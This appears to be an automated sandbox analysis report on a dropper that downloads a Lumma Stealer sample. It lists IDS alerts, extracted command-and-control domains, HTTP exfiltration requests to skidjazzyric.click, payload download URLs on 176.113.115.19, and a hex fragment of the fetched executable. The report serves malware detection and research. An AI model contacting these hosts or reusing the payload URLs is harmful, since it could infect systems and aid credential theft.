        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0077BAE9
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx3_2_0079BAD7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0079BAD7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h3_2_00779AA7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0078DA97
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0077AB67
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00786BA7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then jmp eax3_2_007A1C3E
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then test esi, esi3_2_0079CC07
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0078ECC9
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0076AC99
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0078BD67
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]3_2_00785D57
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ebx, eax3_2_00765D17
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ebp, eax3_2_00765D17
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00776D15
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0078EDC6
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0077AD91
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0077BD88
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ebx, edx3_2_0078DE57
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]3_2_0077BE2C
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0078EE1A
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov ecx, eax3_2_007A0E12
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0078EE08
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h3_2_0078BE07
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh3_2_007A2F87

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2059089 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (skidjazzyric .click in TLS SNI) : 192.168.2.9:49768 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2059088 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click) : 192.168.2.9:63218 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059089 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (skidjazzyric .click in TLS SNI) : 192.168.2.9:49762 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2059089 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (skidjazzyric .click in TLS SNI) : 192.168.2.9:49756 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2059089 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (skidjazzyric .click in TLS SNI) : 192.168.2.9:49776 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2059089 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (skidjazzyric .click in TLS SNI) : 192.168.2.9:49784 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49762 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49762 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49756 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49756 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49776 -> 104.21.32.1:443
        Source: Malware configuration extractorURLs: chipdonkeruz.shop
        Source: Malware configuration extractorURLs: handscreamny.shop
        Source: Malware configuration extractorURLs: apporholis.shop
        Source: Malware configuration extractorURLs: robinsharez.shop
        Source: Malware configuration extractorURLs: soundtappysk.shop
        Source: Malware configuration extractorURLs: crowdwarek.shop
        Source: Malware configuration extractorURLs: skidjazzyric.click
        Source: Malware configuration extractorURLs: versersleep.shop
        Source: Malware configuration extractorURLs: femalsabler.shop
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 10 Jan 2025 15:09:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 10 Jan 2025 15:00:01 GMTETag: "51600-62b5b59615dc3"Accept-Ranges: bytesContent-Length: 333312Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 72 f6 05 ca 36 97 6b 99 36 97 6b 99 36 97 6b 99 8b d8 fd 99 37 97 6b 99 28 c5 ef 99 13 97 6b 99 28 c5 fe 99 28 97 6b 99 28 c5 e8 99 4c 97 6b 99 11 51 10 99 35 97 6b 99 36 97 6a 99 43 97 6b 99 28 c5 e1 99 37 97 6b 99 28 c5 ff 99 37 97 6b 99 28 c5 fa 99 37 97 6b 99 52 69 63 68 36 97 6b 99 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 02 9a cc 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 26 04 00 00 2e 01 00 00 00 00 00 b5 5e 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 0e b5 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 2b 04 00 28 00 00 00 00 d0 04 00 28 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 47 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 24 04 00 00 10 00 00 00 26 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 e4 86 00 00 00 40 04 00 00 60 00 00 00 2a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 bb 00 00 00 d0 04 00 00 8c 00 00 00 8a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
        Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
        Source: Joe Sandbox ViewIP Address: 176.113.115.19 176.113.115.19
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49768 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49762 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49756 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49776 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49784 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49735 -> 176.113.115.19:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49726 -> 104.21.56.70:443
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skidjazzyric.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: skidjazzyric.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1XGZ0SPZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12780Host: skidjazzyric.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WZI9I9BZA1IQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15022Host: skidjazzyric.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=04OIJ16I85GTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20538Host: skidjazzyric.click
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004029EA InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029EA
        Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
        Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
        Source: global trafficDNS traffic detected: DNS query: post-to-me.com
        Source: global trafficDNS traffic detected: DNS query: skidjazzyric.click
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skidjazzyric.click
        Source: Mmm7GmDcR4.exe, 00000000.00000003.1368282347.000000000052A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/
        Source: Mmm7GmDcR4.exe, 00000000.00000003.1368282347.000000000052A000.00000004.00000020.00020000.00000000.sdmp, Mmm7GmDcR4.exe, 00000000.00000003.3641286720.0000000000520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
        Source: Mmm7GmDcR4.exe, 00000000.00000003.1368282347.000000000052A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe%D
        Source: Mmm7GmDcR4.exe, 00000000.00000003.1368282347.000000000052A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe3%
        Source: Mmm7GmDcR4.exe, 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE
        Source: Mmm7GmDcR4.exe, 00000000.00000002.3769724782.0000000000520000.00000004.00000020.00020000.00000000.sdmp, Mmm7GmDcR4.exe, 00000000.00000003.1368282347.000000000052A000.00000004.00000020.00020000.00000000.sdmp, Mmm7GmDcR4.exe, 00000000.00000003.3641286720.0000000000520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exetD
        Source: 3B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: 3B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: 3B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: 3B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: 3B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: 3B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: 3B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: 3B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: 3B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
        Source: 3B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: 3B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: 3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: 3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: 3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: 3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: 3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: 3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: 3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: Mmm7GmDcR4.exe, 00000000.00000003.3641286720.0000000000500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
        Source: Mmm7GmDcR4.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
        Source: Mmm7GmDcR4.exe, 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
        Source: Mmm7GmDcR4.exe, 00000000.00000002.3769724782.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Mmm7GmDcR4.exe, 00000000.00000003.3641286720.0000000000500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
        Source: Mmm7GmDcR4.exe, 00000000.00000002.3769724782.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Mmm7GmDcR4.exe, 00000000.00000003.3641286720.0000000000500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEP
        Source: 3B5A.tmp.exe, 00000003.00000003.1405892976.0000000000849000.00000004.00000020.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1405892976.0000000000882000.00000004.00000020.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000002.1675015771.0000000000839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/
        Source: 3B5A.tmp.exe, 00000003.00000003.1439816297.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1440223564.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1405892976.0000000000882000.00000004.00000020.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1424356651.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000002.1675662559.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1405892976.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/api
        Source: 3B5A.tmp.exe, 00000003.00000003.1423380064.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1423266241.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1423536222.0000000002EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/apik
        Source: 3B5A.tmp.exe, 00000003.00000003.1405892976.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/d8
        Source: 3B5A.tmp.exe, 00000003.00000003.1443206084.000000000317D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: 3B5A.tmp.exe, 00000003.00000003.1443206084.000000000317D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: 3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: 3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: 3B5A.tmp.exe, 00000003.00000003.1443206084.000000000317D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
        Source: 3B5A.tmp.exe, 00000003.00000003.1443206084.000000000317D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
        Source: 3B5A.tmp.exe, 00000003.00000003.1443206084.000000000317D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
        Source: 3B5A.tmp.exe, 00000003.00000003.1443206084.000000000317D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: 3B5A.tmp.exe, 00000003.00000003.1443206084.000000000317D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
        Source: 3B5A.tmp.exe, 00000003.00000003.1443206084.000000000317D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
